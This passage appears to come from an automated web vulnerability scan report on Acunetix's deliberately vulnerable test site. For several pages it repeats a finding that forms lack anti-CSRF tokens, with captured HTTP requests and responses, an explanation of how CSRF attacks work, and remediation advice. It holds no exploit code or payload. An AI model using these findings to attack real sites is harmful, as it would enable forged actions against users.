          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSend" ].

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        7. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in an HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        8. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in an HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

